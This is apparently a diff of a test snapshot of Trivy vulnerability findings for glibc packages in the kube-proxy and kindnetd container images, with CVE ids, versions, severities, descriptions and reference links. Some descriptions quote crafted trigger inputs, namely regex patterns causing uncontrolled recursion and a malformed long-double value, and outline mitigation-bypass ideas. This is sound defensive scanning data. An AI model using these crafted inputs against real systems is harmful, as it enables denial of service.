"https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-10029", + "installedVersion": "2.28-10", "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "https://access.redhat.com/security/cve/CVE-2020-10029", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "https://linux.oracle.com/cve/CVE-2020-10029.html", + "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200327-0003/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-10029", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://avd.aquasec.com/nvd/cve-2020-10029", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://access.redhat.com/security/cve/CVE-2020-10029", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4416-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4416-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-27618", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://access.redhat.com/security/cve/CVE-2020-27618", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "https://linux.oracle.com/cve/CVE-2020-27618.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210401-0006/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://avd.aquasec.com/nvd/cve-2020-27618", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://access.redhat.com/security/cve/CVE-2020-27618", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "http://cxib.net/stuff/glob-0day.c", "http://securityreason.com/achievement_securityalert/89", @@ -77712,7 +79643,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ @@ -77758,10 +79689,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/107160", "https://access.redhat.com/security/cve/CVE-2018-20796", @@ -77775,7 +79706,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ @@ -77821,10 +79752,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "https://access.redhat.com/security/cve/CVE-2019-1010022", "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", @@ -77837,7 +79768,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: stack guard protection bypass", "references": [ @@ -77879,10 +79810,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/109167", "https://access.redhat.com/security/cve/CVE-2019-1010023", @@ -77896,7 +79827,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ @@ -77942,10 +79873,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/109162", "https://access.redhat.com/security/cve/CVE-2019-1010024", @@ -77960,7 +79891,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ @@ -78010,10 +79941,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "https://access.redhat.com/security/cve/CVE-2019-1010025", "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", @@ -78027,7 +79958,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ @@ -78072,6815 +80003,6173 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1304", - "installedVersion": "1.46.2-2", - "packageName": "libcom-err2", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19126", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8361", - "https://access.redhat.com/security/cve/CVE-2022-1304", - "https://bugzilla.redhat.com/2069726", - "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", - "https://errata.almalinux.org/9/ALSA-2022-8361.html", - "https://errata.rockylinux.org/RLSA-2022:8361", - "https://linux.oracle.com/cve/CVE-2022-1304.html", - "https://linux.oracle.com/errata/ELSA-2022-8361.html", - "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", - "https://ubuntu.com/security/notices/USN-5464-1", - "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "https://access.redhat.com/security/cve/CVE-2019-19126", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "https://linux.oracle.com/cve/CVE-2019-19126.html", + "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + 